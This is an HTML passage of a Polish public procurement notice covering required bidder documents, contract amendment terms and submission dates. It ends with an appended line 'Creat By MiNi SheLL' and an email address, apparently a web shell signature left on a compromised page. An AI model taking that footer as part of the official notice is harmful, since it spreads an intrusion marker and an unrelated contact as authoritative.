stanowi załącznik nr 5 do SWZ),<br/>f) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość<br/>posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym<br/>niż 3 miesiące przed jej złożeniem;<br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego<br/>podmiotowych środków dowodowych, o których mowa w ust. 1, wykonawca składa inne podmiotowe<br/>środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez<br/>zamawiającego warunku udziału w postępowaniu lub kryterium selekcji dotyczącego sytuacji<br/>ekonomicznej lub finansowej.<br/>9.2.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej<br/>Polskiej, zamiast dokumentów, o których mowa w pkt 9.1 litera e) składa dokument lub dokumenty<br/>wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające<br/>odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, o którym mowa<br/>powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>9.3Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w pkt 9.1 litera e) zastępuje się je w całości lub części dokumentem<br/>zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych<br/>do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo<br/>organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania Wykonawcy.<br/>9.4Wykonawca, który polega na zdolnościach technicznych lub zawodowych (warunki wskazane w pkt<br/>7.1. pkt 4) SWZ lub sytuacji finansowej i ekonomicznej (warunki wskazane w pkt. 7.1 pkt. 3 SWZ) na<br/>zasadach określonych w art. 118 PZP zobowiązany będzie do przedstawienia podmiotowych środków<br/>dowodowych, o których mowa w pkt 9.1. lit d i e) dotyczących tych podmiotów, potwierdzających, że<br/>nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania.<br/>9.5Dokumenty, o których mowa w pkt 9.1. lit a-f) Wykonawca będzie obowiązany złożyć w terminie<br/>wskazanym przez Zamawiającego, nie krótszym niż 5 dni, określonym w wezwaniu wystosowanym<br/>przez Zamawiającego do wykonawcy po otwarciu ofert w trybie art. 274 ust. 1 PZP.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">9..1 W celu potwierdzenia braku podstaw do wykluczenia z postępowania, o których mowa w pkt 6.1. i<br/>6.2. SWZ<br/>d) W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu<br/>Zamawiający żąda oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o<br/>którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych<br/>przez zamawiającego w zakresie art 108 ust 1 pkt 3, 108 ust.1 pkt. 4, 108 ust.1 pkt. 5, 108 ust. 1 pkt.6 ,<br/>109 ust 5,7 (wzór oświadczenia stanowi załącznik nr 6 do SWZ).<br/>e) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>9.2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej<br/>Polskiej, zamiast dokumentów, o których mowa w pkt 9.1 litera e) składa dokument lub dokumenty<br/>wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające<br/>odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, o którym mowa<br/>powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>9.3 Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w pkt 9.1 litera e) zastępuje się je w całości lub części dokumentem<br/>zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych<br/>do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo<br/>organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania Wykonawcy.<br/>9.4 Wykonawca, który polega na zdolnościach technicznych lub zawodowych (warunki wskazane w pkt<br/>7.1. pkt 4) lub sytuacji finansowej i ekonomicznej (warunki wskazane w pkt. 7.1 pkt. 3) na zasadach<br/>określonych w art. 118 PZP zobowiązany będzie do przedstawienia podmiotowych środków<br/>dowodowych, o których mowa w pkt 9.1. lit d i e) dotyczących tych podmiotów, potwierdzających, że<br/>nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania.<br/>9.5 Dokumenty, o których mowa w pkt 9.1. lit a-f) Wykonawca będzie obowiązany złożyć w terminie<br/>wskazanym przez Zamawiającego, nie krótszym niż 5 dni, określonym w wezwaniu wystosowanym<br/>przez Zamawiającego do wykonawcy po otwarciu ofert w trybie art. 274 ust. 1 PZP.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty składane wraz z ofertą:<br/>1) Formularz ofertowy - stanowiący Załącznik nr 1 do SWZ.<br/>2) Kosztorysem ofertowym - sporządzonym ze szczegółową kalkulacją cen jednostkowych (RMS<br/>, narzuty) w oparciu o przedmiary wskazane w załączniku nr 10<br/>3) Oświadczenie Wykonawcy o braku podstaw do wykluczenia z prowadzonego postępowania<br/>oraz o spełnianiu warunków uczestnictwa - Załącznik nr 2 (A i B) do SWZ.<br/>4) zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów zgodnie z pkt 7.3 SWZ, jeżeli Wykonawca wykazując spełnienie<br/>warunków udziału w postępowaniu polega na zdolnościach lub sytuacji innych podmiotów;<br/>(Niewiążący wzór zobowiązania do oddania wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby wykonania zamówienia stanowi załącznik nr 7 do SWZ),<br/>5) Oświadczenie podmiotu udostępniającego zasoby, o braku podstaw wykluczenia oraz o<br/>spełnianiu warunków w zakresie w jakim powołuje się na zasoby Załącznik nr 7 do SWZ..<br/>6) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru w celu potwierdzenia, że osoba<br/>działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania. Wykonawca nie jest<br/>zobowiązany do złożenia dokumentów, o których mowa w zdaniu poprzednim, jeżeli<br/>Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile<br/>Wykonawca dostarczy dane umożliwiające dostęp do tych dokumentów, 7) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy, jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów rejestrowych<br/>8) pełnomocnictwo lub inny dokument potwierdzający umocowanie dla pełnomocnika<br/>ustanowionego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia do<br/>reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego, jeżeli ofertę składają Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia<br/>9) dokumenty, o których mowa wyżej SWZ dla osoby działającej w imieniu podmiotu<br/>udostępniającego Wykonawcy zasoby na zasadach określonych w art. 118 PZP,<br/>10) oświadczenia w zakresie kryterium oceny ofert - na formularzu oferty.<br/>11) o ile dotyczy dokumenty potwierdzające równoważność, o których mowa w pkt. 3.17 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z<br/>postępowania. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>warunki udziału w postępowaniu określone w pkt 7.1.3 oraz 7.1.4 litera b) powinni spełniać<br/>łącznie wszyscy Wykonawcy. Natomiast warunek określony w pkt 7.1.4 litera a) musi spełnić co<br/>najmniej jeden wykonawców ubiegających się o zamówienie.<br/>W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej postanowienia<br/>dot. oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum)<br/>stosuje się odpowiednio.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych Wykonawców, którzy wykonają roboty budowlane lub usługi do realizacji<br/>których te zdolności są wymagane. W przypadku, Wykonawców wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane lub usługi wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi załącznik<br/>nr 3 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy określa § 24 wzoru umowy<br/>1.Zmiana postanowień Umowy w stosunku do treści Oferty, na podstawie której dokonano<br/>wyboru Wykonawcy, może nastąpić w przypadkach i na warunkach określonych art. 455 Ustawy PZP.<br/>2. Zamawiający dopuszcza możliwość zmiany Umowy, w przypadku wystąpienia jednej lub kilku<br/>z następujących okoliczności:<br/>2.1 konieczności wykonania Prac dodatkowych, w warunkach określonych w art. 455 ust. 1 pkt 3<br/>Ustawy PZP, których nie można było przewidzieć na etapie udzielenia zamówienia, a wykonanie<br/>których jest konieczne do wykonania przedmiotu Umowy – z zastrzeżeniem postanowień ust.<br/>20.6;<br/>2.2 konieczności wykonania Prac zamiennych;<br/>2.3 konieczności zmiany danych projektowych, na podstawie których była sporządzona Oferta i<br/>mających wpływ na realizację Umowy lub korzystanie z Prac przez Zamawiającego;<br/>2.4 zmiany prawa lub obowiązujących norm lub decyzji administracyjnych mających wpływ na<br/>zakres lub sposób realizacji Umowy lub korzystania z Prac przez Zamawiającego;<br/>2.5 zmiany Podwykonawcy<br/>2.6 wystąpienia Siły Wyższej;<br/>2.7 przewlekłości w wydaniu decyzji administracyjnych, pozwoleń, zezwoleń, opinii niezbędnych<br/>do wykonania Prac, mających wpływ na terminy realizacji Umowy;<br/>2.8 zawieszenia Umowy;<br/>2.9 wydania decyzji administracyjnych, z których wynika konieczność zmian w zakresie realizacji<br/>Umowy;<br/>2.10 zmiany w składzie konsorcjum Wykonawcy spowodowanej wystąpieniem niewypłacalności<br/>któregokolwiek z członków konsorcjum lub wszczęciem postępowania likwidacyjnego wobec<br/>któregokolwiek z członków konsorcjum;<br/>2.11 potrzeby poprawy bezpieczeństwa ludzi i sprzętu lub majątku Zamawiającego;<br/>2.12 konieczności zastosowania innych rozwiązań technicznych, technologicznych lub<br/>organizacyjnych niż wskazane w Umowie, w sytuacji, gdyby zastosowanie przewidzianych<br/>rozwiązań groziło niewykonaniem lub wadliwym wykonaniem Prac, w tym zmiany kolejności<br/>wykonywania Prac w stosunku do kolejności ustalonej harmonogramie wraz ze zmianą<br/>kolejności płatności za te Prace;<br/>2.13 wystąpienia przyczyn po stronie Zamawiającego, wynikających z kolizji Prac<br/>wykonywanych przez Wykonawcę, z działaniami innych wykonawców Zamawiającego,<br/>wykonujących je na Terenie Prac lub oddziałujących na Prace Wykonawcy;<br/>2.14 innych przypadków przewidujących zmianę Umowy, wyraźnie przewidzianych w Umowie;<br/>2.15 możliwości zastosowania materiałów lub urządzeń, albo sposobu realizacji Prac, o równym<br/>lub lepszym standardzie niż przyjęte w Umowie, pozwalających na zaoszczędzenie kosztów<br/>realizacji Prac lub kosztów eksploatacji przedmiotu Umowy lub umożliwiających uzyskanie<br/>lepszej jakości Prac.<br/>3. Niezależnie od postanowień ust. 1 i 2 Zamawiający może w dowolnej chwili wystąpić z<br/>inicjatywą zmian, które nie są wykluczone przez PZP.<br/>4. Zwiększenie Wynagrodzenia Umownego, może wystąpić wyłącznie w przypadku:<br/>4.1 zwiększenia zakresu Prac wynikającego z przesłanek określonych w ust. 1. lub 2. jeżeli<br/>konieczność zmiany Umowy nie wynika z przyczyn leżących po stronie Wykonawcy;<br/>4.2 zmiany stawki podatku od towarów i usług lub podatku akcyzowego,<br/>5. Jeżeli wystąpi konieczność wykonania prac na podstawie ust. 1 i 2 , Wykonawca jest<br/>upoważniony do rozpoczęcia wykonywania takich prac jedynie na podstawie podpisanego (w<br/>tym prawidłowo zaakceptowanego i zatwierdzonego) przez Zamawiającego aneksu do Umowy,<br/>pod rygorem utraty przez Wykonawcę wobec Zamawiającego wszelkich roszczeń wynikających<br/>lub związanych z wykonaniem Prac. Wykonawca zobowiązany jest do niezwłocznego<br/>dostarczenia wyceny na prace na podstawie ust. 1 i 2, którą będzie związany minimum 30 Dni<br/>od daty dostarczenia Zamawiającemu.<br/>Pozostałe zmiany określono w § 24 Umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-26 14:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego na miniPortalu. Funkcjonalność do zaszyfrowania oferty dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-26 14:55</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-24</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com